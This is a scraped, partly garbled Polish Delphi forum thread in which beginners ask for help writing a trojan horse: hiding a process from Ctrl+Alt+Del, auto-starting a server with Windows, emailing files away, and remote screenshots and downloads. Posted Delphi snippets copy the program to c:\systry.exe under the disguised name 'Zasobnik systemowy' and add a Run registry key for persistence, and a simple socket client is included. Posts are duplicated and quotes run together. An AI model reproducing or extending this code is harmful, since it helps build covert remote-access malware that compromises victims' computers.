Witam wszystkich
Dobra programisci Delphi , niech no mi ktory powie jak ukryc aplikacje w systemie windows NT tak aby nie byla widoczna po wcisnieci alt+ctr+del
nie uzywajac funkcji registerserviceprocess .
Witam wszystkich
Dobra programisci Delphi , niech no mi ktory powie jak ukryc aplikacje w systemie windows NT tak aby nie byla widoczna po wcisnieci alt+ctr+del
nie uzywajac funkcji registerserviceprocess .
Moze powinienes dodac w uses RegistryOriginally posted by grave
Robię trojana i chcę, żeby serwer się uruchamiał z każdym startem windowsa.
Dlatego napisałem w końcówce kodu takie coś:
procedure TForm1.FormCreate(Sender: TObject);
var
reg:tregistry;
begin
reg.Create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWAREMicrosoftWindowsCurrentVersio nRun',True);
reg.WriteString('Zasobnik systemowy','c:systry.exe');
copyfile(pchar(paramstr(0)),pchar('c:systry.exe'), true);
BorderIcons := [biSystemMenu];
end;
Ale kiedy próbujęt oskompilować wyskakuje błąd.
A te 2 linijki kodu:
var
reg:tregistry
są pomijane (tzn. nie ma takiego kółka po lewej stronie)
Czy coś zrobiłem źle?
Ewentualnie co trzeba napisać, żeby serwer uruchamiał się z każdym startem windowsa?Odrazu by poskutkowalo
slawko:
Jakos da sie to ukryc, do pliku ktory ma byc ukryty dolacz biblioteke kernel32.dll (chyba) i funkcje regi....() odrazu zacznie dzialac bo na WIN 2000/NT/XP bez dolaczonej biblioteki nie dziala
Mam zamiar napisac wlasnego konika w Delphi i potrzebuje nastepujacego komponentu:
TNMMsg
Gdzie go moge znalezc?
Jakie inne komponenty beda mi jeszcze potrzebne?
(prosze o konkretne linki, etc.)
http://www.netmastersllc.com/Download/Page1/default.asp
To zalezy jakie ocje chcesz miec w trojanie .......
Hmmm ...
Zarejestrowalem sie na tej stronce i mimo ze klikam na wlasciwy link to nie moge nic sciagnac, pisze tylko ze strona o takim adresie nie zostala odnaleziona![]()
Moze mi to ktos podrzucic na maila :?: :wink:
Jakie polecenie spowoduje wyslanie jakiegos pliku na jakis adres e-mail?
Mam pytanie:
Chcialbym napisac wlasny program typu "kon trojanski".
Czy ktos mi pomoze zrobic pierwsze kroki :?:
Chcialbym aby mial takie funkcje: (na poczatek wystarcza)
- download plikow;
- print screen (zrzut ekranu);
Od czegos trzeba zaczac :wink:
PS: oczywiscie zeby byla tez mozliwosc zmainy hasla i portu.
Ja proponuje poszukac troche na forum bo pisano o tym duuzo razy.Originally posted by Questor
Mam pytanie:
Chcialbym napisac wlasny program typu "kon trojanski".
Czy ktos mi pomoze zrobic pierwsze kroki :?:
Chcialbym aby mial takie funkcje: (na poczatek wystarcza)
- download plikow;
- print screen (zrzut ekranu);
Od czegos trzeba zaczac :wink:
PS: oczywiscie zeby byla tez mozliwosc zmainy hasla i portu.
Kurs pisania trojanow jest na www.cc-team.org zrodla na www.4programmers.net i na www.delphi-area.com
reszta na www.google.pl
Milego szukania.
Zrobilem juz klienta i serwera. :wink:
Uzywajac komponentu Delphi z zakladki internet: ClientSocket & ServerSocket, nawiazalem polaczenie klient->serwer :wink:
Co wpisac w kliencie a co w serwerze zeby np. otworzyc cd-rom :?:
(co i gdzie zadeklarowac oraz jakie procedury?);
(reszte funkcji postaram sie juz sam dorobic).
Mimo ze przegladnalem juz tyle stronek i naczytalem sie tylu artow to do tej pory nie udalo mi sie znalezc tego czego szukam :cry:
Na www.cc-team.org jest owy kurs jak napisac trojana, tylko ze moje delphi sie buntuje na widok void __fastcall ...
Za kazda wskazowke bede wdzieczny 8)
(dopiero rozpoczynam przygode z pisaniem czegokolwiek wiec sie nie dziwcie moim pytaniom i nieznajomosci tematu).
Wprawdzie nie jestem tutaj aby szukac ale na www.4programmers.net jest ciekawy prosty trojan do ktorego jest dolaczona bardzo prosta do zrozumienia dokumentacja z opisem wszystkich komend w trojanie i sa wlasnie opisane komendy o ktore pytasz
Jeszcze raz polecam przegladanac www.4programmers.net gdzies tam w zrodelkach delphi znajdziesz... (tylko nie mowi ze nie znalazles bo musi tam byc)
A swoja droga piszesz ze dopiero zaczynasz uczyc sie programowac w delphi i rozpoczynasz od trojanow... troche dziwne ale uwazaj jak robisz, rob jak uwazasz ja w to nei wnikam.
Na www.sasquach.prv.pl znalazlem dosyc latwy (z pozoru) przyklad jak napisac aplikacje klienta i serwera, tylko ze jest kilka bledow w kodzie klienta.
Troszke pozmienialem i wyglada to tak:
W "orginalnym" kodzie polaczenie i wyslanie komendy bylo pod pierwszym buttonem, a z tego co wyczytalem w opisie powinno byc polaczenie pod jednym a komenda pod drugim.Kod:unit Unit1; interface uses **Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, **Dialogs, StdCtrls, ScktComp; type **TForm1 = class(TForm) ****edtAdres: TEdit; ****edtWiadomosc: TEdit; ****btnWyslij: TButton; ****btnPlik: TButton; ****Klient: TClientSocket; ****procedure btnWyslijClick(Sender: TObject); ****procedure btnPlikClick(Sender: TObject); **private ****{ Private declarations } **public ****{ Public declarations } **end; var **Form1: TForm1; implementation {$R *.dfm} procedure TForm1.btnWyslijClick(Sender: TObject); **begin **Klient.Host := edtAdres.Text; **Klient.Active := True; end; procedure TForm1.btnPlikClick(Sender: TObject); **var **wiadomosc : string; **begin **wiadomosc := Form1.edtWiadomosc.Text; **Klient.Socket.SendText(wiadomosc); end; end.
Jakos sobie to pozmienialem no i teraz dziala tak jak powinno :wink:
Pomóżcie mi, potrzebuje komponentów tClientSocket i TSerwerSocket, a mam wersję delphi 7 personal w której tego nie ma. Podejrzewam że gdyby ktoś mi je wysłał via mail (systerneox@wp.pl) to mógłbym je zainstalować bez problemu. Delphi 7 Architect nie wchodzi w gre...
No jeszcze tego by brakowało ... przeca to w pełni komercyjna edycjaOriginally posted by NeoX+--><div class='quotetop'>CYTAT(NeoX)</div>W miejscu instalacji jest katalog Bin w ktorym jest pakiet dclsockets70.bplPomóżcie mi, potrzebuje komponentów tClientSocket i TSerwerSocket, a mam wersję delphi 7 personal w której tego nie ma. Podejrzewam że gdyby ktoś mi je wysłał via mail (systerneox@wp.pl) to mógłbym je zainstalować bez problemu.[/b]
Wspomniane komponenty mozna dodac za pomoca Instalatora pakietów ( zakładka Component )
<!--QuoteBegin-NeoX
Delphi 7 Architect nie wchodzi w gre...
procedure TForm1.Button1Click(Sender: TObject);
var reg:tregistry;
begin
reg:=tregistry.create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWAREMicrosoftWindowsCurrentVersio nRun',True);
reg.WriteString('Zasobnik systemowy','c:systry.exe');
copyfile(pchar(paramstr(0)),pchar('c:systry.exe'), true);
BorderIcons := [biSystemMenu];
end;